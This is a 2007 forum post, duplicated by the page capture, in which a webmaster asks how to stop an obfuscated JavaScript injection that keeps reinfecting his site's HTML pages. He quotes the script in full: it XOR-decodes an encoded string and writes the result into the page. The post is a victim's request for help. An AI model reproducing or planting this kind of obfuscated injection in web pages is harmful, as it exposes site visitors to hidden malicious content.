GoFuckYourself.com - Adult Webmaster Forum - View Single Post - What is this malicious injected code all about?

RegUser · 11-21-2007, 05:23 PM

I remember a similar code infecting tonnes of sites out there. It reinfects html pages within days if cleaned.
I was under the impression that it happens because of a vulnerability with windows virtual machine but am not sure how to prevent it. Does any one know what causes this and how to fix it.....keep in mind that it propgates via internet.

<script language="JavaScript">e = '0x00' + '56';str1 = "%ED%B5%BE%A3%C9%A4%A5%AE%BD%B2%EA%F7%A3%BE%A4 %BE%B7%BE%BD%BE%A5%AE%EF%B1%BE%B5%B5%B2%BB%F7%EB%E D%BE%B3%A7%B6%BA%B2%C9%A4%A7%B4%EA%F7%B1%A5%A5%B9% EF%F8%F8%A7%BE%BC%B8%B4%BB%A5%FB%BE%BB%B3%B8%F8%BD %B5%F8%B0%A7%B2%AE%F8%F7%C9%A0%BE%B5%A5%B1%EA%E6%C 9%B1%B2%BE%B0%B1%A5%EA%E6%EB%ED%F8%BE%B3%A7%B6%BA% B2%EB%ED%F8%B5%BE%A3%EB";str=tmp='';for(i=0;i<str1 .length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

11-21-2007, 05:23 PM
RegUser Confirmed User Join Date: Nov 2004 Posts: 1,472	I remember a similar code infecting tonnes of sites out there. It reinfects html pages within days if cleaned. I was under the impression that it happens because of a vulnerability with windows virtual machine but am not sure how to prevent it. Does any one know what causes this and how to fix it.....keep in mind that it propgates via internet. <script language="JavaScript">e = '0x00' + '56';str1 = "%ED%B5%BE%A3%C9%A4%A5%AE%BD%B2%EA%F7%A3%BE%A4 %BE%B7%BE%BD%BE%A5%AE%EF%B1%BE%B5%B5%B2%BB%F7%EB%E D%BE%B3%A7%B6%BA%B2%C9%A4%A7%B4%EA%F7%B1%A5%A5%B9% EF%F8%F8%A7%BE%BC%B8%B4%BB%A5%FB%BE%BB%B3%B8%F8%BD %B5%F8%B0%A7%B2%AE%F8%F7%C9%A0%BE%B5%A5%B1%EA%E6%C 9%B1%B2%BE%B0%B1%A5%EA%E6%EB%ED%F8%BE%B3%A7%B6%BA% B2%EB%ED%F8%B5%BE%A3%EB";str=tmp='';for(i=0;i<str1 .length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>